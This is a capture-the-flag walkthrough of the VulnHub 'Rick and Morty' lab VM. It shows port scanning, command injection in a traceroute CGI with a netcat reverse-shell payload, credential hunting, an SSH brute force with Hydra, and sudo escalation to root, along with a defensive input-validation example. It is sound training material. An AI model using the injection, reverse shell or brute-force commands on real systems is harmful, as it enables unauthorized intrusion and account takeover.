A new Boot2Root came online on VulnHub and it looked like fun. This one is themed around a cartoon show called “Rick and Morty”.
First order of business for me is to run an Nmap scan. I like to do a full TCP port scan with service enumeration.
root@kali:~# nmap 10.0.1.9 -Pn -p- -sV
Starting Nmap 7.25SVN ( https://nmap.org ) at 2017-10-16 13:52 EDT
Nmap scan report for 10.0.1.9
Host is up (0.00022s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
22/tcp    open  ssh?
80/tcp    open  http    Apache httpd 2.4.27 ((Fedora))
9090/tcp  open  http    Cockpit web service
13337/tcp open  unknown
22222/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
60000/tcp open  unknown
Before hitting the well-known ports, I inspected the more unusual ones. The VM's console identifies port 9090 as its management interface (Cockpit). Connecting to it over HTTPS got me the first flag:
FLAG {There is no Zeus, in your face!} – 10 points
Connecting to port 13337 with netcat reveals yet another flag:
root@kali:~# nc 10.0.1.9 13337
FLAG:{TheyFoundMyBackDoorMorty}-10Points
Connecting to port 60000 gave me a sort of “fake” shell to play around with. Listing the directory showed a file named FLAG.txt, and reading it gave me the flag.
root@kali:~# nc 10.0.1.9 60000
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt
# cat FLAG.txt
FLAG{Flip the pickle Morty!} – 10 Points
Running Nmap with its default scripts (the -sC flag) shows that FTP allows anonymous, unauthenticated login. I connected to it from my web browser.
ftp://10.0.1.9
There was a flag file inside to download:
FLAG{Whoa this is unexpected} – 10 Points
Moving on now to the main web app, I reviewed the source code, but there isn’t much to look at. Running any spider application or just going to the common “robots.txt” file in the web root reveals this:
They're Robots Morty! It's ok to shoot them! They're just Robots!
/cgi-bin/root_shell.cgi
/cgi-bin/tracertool.cgi
/cgi-bin/*
Root_shell.cgi is a troll, but tracertool.cgi is pretty interesting: it is a web application that runs traceroute against a user-supplied IP address. As an obvious candidate for command injection, I appended a semicolon to run a separate command, and used netcat to send myself a reverse shell:
127.0.0.1; nc -e /bin/sh 10.0.1.15 4444
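As an added example (not code from the original write-up or from the VM's own CGI), here is how a traceroute handler like tracertool.cgi should accept its target so that the semicolon trick above simply fails: parse the parameter as an IP address literal and hand it to traceroute as a single argv element instead of splicing it into a shell command line. The function names are my own.

```python
import ipaddress
import subprocess
from typing import List, Optional

# Vulnerable pattern (the behaviour tracertool.cgi exhibits): the raw parameter is
# spliced into a shell command line, so "127.0.0.1; <cmd>" runs <cmd> as the web user.
#     os.system("traceroute " + target)      # DO NOT DO THIS


def parse_target(raw: str) -> Optional[ipaddress._BaseAddress]:
    """Return the parsed IPv4/IPv6 address, or None if raw is not a bare IP literal."""
    try:
        return ipaddress.ip_address(raw.strip())
    except ValueError:
        # anything containing spaces, ';', '|', '$(...)' or a hostname fails to parse
        return None


def build_traceroute_argv(raw: str) -> List[str]:
    """Build the argv list for traceroute; raises ValueError on a bad target."""
    target = parse_target(raw)
    if target is None:
        raise ValueError("target must be a single IPv4 or IPv6 address")
    # -n: no reverse DNS lookups, -m 15: cap the hop count so the CGI cannot hang
    return ["traceroute", "-n", "-m", "15", str(target)]


def run_traceroute(raw: str) -> str:
    """Run traceroute without a shell: the target is one argv element, so shell
    metacharacters in it are never interpreted by /bin/sh."""
    argv = build_traceroute_argv(raw)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=60, check=False)
    return proc.stdout if proc.returncode == 0 else proc.stderr


if __name__ == "__main__":
    # constructed inputs: a legitimate target and an injection attempt
    for candidate in ("127.0.0.1", "127.0.0.1; id"):
        try:
            print(candidate, "->", build_traceroute_argv(candidate))
        except ValueError as exc:
            print(candidate, "-> rejected:", exc)
```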
After getting a shell I started poking around. Looking in the html directory I saw a passwords folder.
cd ..
cd html
ls -lah
total 536K
drwxr-xr-x. 3 root root   76 Aug 22 03:36 .
drwxr-xr-x. 4 root root   33 Aug 22 02:27 ..
-rw-r--r--. 1 root root  326 Aug 22 01:58 index.html
-rw-r--r--. 1 root root 528K Aug 22 01:50 morty.png
drwxr-xr-x. 2 root root   44 Aug 23 19:51 passwords
-rw-r--r--. 1 root root  126 Aug 22 03:36 robots.txt
Opening the passwords folder in the web browser reveals a FLAG.txt.
FLAG{Yeah d- just don’t do it.} – 10 Points
Also worth noting is the passwords.html file in the same folder. Looking at it doesn’t tell much, but when I viewed the source, I saw a password hidden in an HTML comment.
<!DOCTYPE html>
<html>
<head>
<title>Morty's Website</title>
<body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need. </body>
<!--Password: winter-->
</head>
</html>
At this point I found that the “cat” command had been aliased to something that just printed a picture of a cat. To read files anyway, I used a grep pattern that matches practically any line:
grep '[a-zA-Z0-9]' /etc/passwd
Running this command I could see all the users on the system.
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-coredump:x:999:998:systemd Core Dumper:/:/sbin/nologin
systemd-timesync:x:998:997:systemd Time Synchronization:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:997:996:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
cockpit-ws:x:996:994:User for cockpit-ws:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
chrony:x:995:993::/var/lib/chrony:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
Knowing the password I found was “winter”, I figured this belonged to Summer. Port 22222 was running OpenSSH so I used that to connect with the “Summer” user account.
root@kali:~# ssh Summer@10.0.1.9 -p 22222
Once logged in as Summer, I saw another FLAG.txt waiting for me.
[Summer@localhost ~]$ ls -lah
total 20K
drwx------. 2 Summer Summer  99 Sep 15 11:49 .
drwxr-xr-x. 5 root   root    52 Aug 18 18:20 ..
-rw-------. 1 Summer Summer   1 Sep 15 11:51 .bash_history
-rw-r--r--. 1 Summer Summer  18 May 30 14:53 .bash_logout
-rw-r--r--. 1 Summer Summer 193 May 30 14:53 .bash_profile
-rw-r--r--. 1 Summer Summer 231 May 30 14:53 .bashrc
-rw-rw-r--. 1 Summer Summer  48 Aug 22 02:46 FLAG.txt
[Summer@localhost ~]$ grep '[a-zA-Z0-9]' FLAG.txt
FLAG{Get off the high road Summer!} – 10 Points
Summer also had read access to the other users’ home directories.
[Summer@localhost home]$ ls -lah
total 0
drwxr-xr-x.  5 root        root         52 Aug 18 18:20 .
dr-xr-xr-x. 17 root        root        236 Aug 18 19:16 ..
drwxr-xr-x.  2 Morty       Morty       131 Sep 15 11:49 Morty
drwxr-xr-x.  4 RickSanchez RickSanchez 113 Sep 21 10:30 RickSanchez
drwx------.  2 Summer      Summer       99 Sep 15 11:49 Summer
Morty had several interesting files in his home directory. I exfiltrated them with SCP.
root@kali:~# scp -P 22222 summer@10.0.1.9:/home/Morty/Safe_Password.jpg .
Safe_Password.jpg was an image file, but viewing the EXIF data or simply running strings on the file shows that a password is contained inside.
root@kali:~# strings Safe_Password.jpg
JFIF
Exif
8
The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek
I also pulled down the journal.txt.zip file.
root@kali:~# scp -P 22222 Summer@10.0.1.9:/home/Morty/journal.txt.zip .
Unzipping the file and supplying the password gave me the journal.txt file:
root@kali:~# unzip journal.txt.zip
Archive:  journal.txt.zip
[journal.txt.zip] journal.txt password:
  inflating: journal.txt
Reading this file gave me the next flag, and a password.
root@kali:~# cat journal.txt
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe? Anyway. Here it is:
FLAG: {131333} – 20 Points
When looking in Rick’s home folder, I could see his safe.
[Summer@localhost RICKS_SAFE]$ ls -lah
total 12K
drwxr-xr-x. 2 RickSanchez RickSanchez   18 Sep 21 09:50 .
drwxr-xr-x. 4 RickSanchez RickSanchez  113 Sep 21 10:30 ..
-rwxr--r--. 1 RickSanchez RickSanchez 8.5K Sep 21 10:24 safe
Summer does not own the “safe” file and has no execute permission on it, but she does have read permission. I copied it to /tmp, where the copy is hers to run.
[Summer@localhost RICKS_SAFE]$ cp safe /tmp/safe
Running the copied binary and supplying the password from the journal gave me the next flag.
[Summer@localhost tmp]$ ./safe 131333
FLAG{And Awwwaaaaayyyy we Go!} – 20 Points
Ricks password hints:
(This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order
1 uppercase character
1 digit
One of the words in my old bands name.
I was also given a password hint for Rick’s password. I don’t watch the TV show, but a quick Google search found that the band name was “The Flesh Curtains”.
I wrote a simple Python script to generate every candidate password allowed by the constraints:
from string import ascii_uppercase, digits

# Clues, in order: one uppercase letter, one digit, then one word from the band name
for c in ascii_uppercase:
    for d in digits:
        print(c + d + "Flesh")
        print(c + d + "Curtains")
After running this script and saving the output to a file, I used THC Hydra to brute force SSH.
hydra -s 22222 -v -V -l RickSanchez -P [PASSWORD FILE] -t 16 10.0.1.9 ssh
[22222][ssh] host: 10.0.1.9   login: RickSanchez   password: P7Curtains
Once I found the valid password, I connected to Rick’s account.
root@kali:~# ssh RickSanchez@10.0.1.9 -p 22222
I ran sudo -l to enumerate his permissions:
[RickSanchez@localhost ~]$ sudo -l
[sudo] password for RickSanchez:
Matching Defaults entries for RickSanchez on localhost:
    !visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User RickSanchez may run the following commands on localhost:
    (ALL) ALL
Rick had sudo permission to run ALL commands, so I simply opened an interactive root shell:
[RickSanchez@localhost ~]$ sudo -i
In the /root/ directory, there was another FLAG.txt.
[root@localhost ~]# grep '[a-zA-Z0-9]' FLAG.txt
FLAG: {Ionic Defibrillator} – 30 points
At this point I was root and had collected all 130 points.